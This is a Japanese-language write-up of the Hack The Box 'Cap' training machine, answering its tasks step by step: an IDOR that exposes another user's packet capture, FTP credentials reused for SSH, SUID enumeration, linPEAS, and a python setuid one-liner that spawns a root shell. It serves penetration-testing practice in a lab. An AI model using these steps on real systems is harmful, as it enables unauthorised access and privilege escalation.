banner
lca

lca

真正的不自由,是在自己的心中设下牢笼。

htb靶场 - キャップ

Cap#

ip:10.10.10.245

Cap は、HTTP サーバーを実行する簡単な難易度の Linux マシンであり、このサーバーはネットワークキャプチャの実行を含む管理機能を実行します。不適切な制御により、安全でない直接オブジェクト参照(IDOR)が発生し、他のユーザーがキャプチャしたデータへのアクセスが得られます。このキャプチャには、足場を得るために使用できる平文の資格情報が含まれています。その後、Linux 機能を利用して root 権限に昇格します。

task1
いくつの TCP ポートが開いていますか?

3

0a3b63c90efdde661a0cd2ca8c9fb567_MD5

task2
“Security Snapshot” を実行した後、ブラウザは /[something]/[id] という形式のパスにリダイレクトされます。ここで、[id] はスキャンされた ID 番号を表します。[something] は何ですか?

528ab93b652c321e083476b15704cffc_MD5

task3 他のユーザーのスキャン結果を見ることができますか?

data の後の数字 id を変更することで、他のユーザーのスキャン結果を見ることができます。

task4 PCAP ファイルに含まれる機密データの ID は何ですか?

538c44c3ee6e4ab0fa9c8f1e91eb49da_MD5

25d1f22548598d75dda64dcdb92fbaea_MD5

62e53d034c91de170301a5beefb6a543_MD5

id は data の番号を指し、0 番の pcap ファイルには ftp ログインのアカウント情報があります。

task5 pcap ファイル内で、機密データはどのアプリケーション層プロトコルに現れますか?

ftp

task6 Nathan の FTP パスワードを取得しました。このパスワードは他のどのサービスで使用できますか?

ssh

task 7 nathan ユーザーのホームディレクトリにある flag を提出してください。

ssh nathan@10.10.10.245

ログイン後に flag が表示されます。

task8 root ディレクトリにある flag を提出してください。

suid ビットの設定を確認します。

find / -perm -u=s -type f 2>/dev/null

c7cacbd5aa296cfdad067ce817920fdb_MD5

権限昇格スクリプト

https://github.com/carlospolop/PEAss-ng/tree/master/linPEAS

ターゲットマシン 10.10.10.245 にアップロードします。

9d8d11c9f2f53b0b55e9a9b284497887_MD5

python

参考:https://gtfobins.github.io/gtfobins/python/

cp $(which python) .
sudo setcap cap_setuid+ep python

./python -c 'import os; os.setuid(0); os.system("/bin/sh")'
/usr/bin/python3.8

import os
os.setuid(0)
os.system("/bin/bash")

78abb3c1c434aed28bfd4a4e6224ec89_MD5

読み込み中...
文章は、創作者によって署名され、ブロックチェーンに安全に保存されています。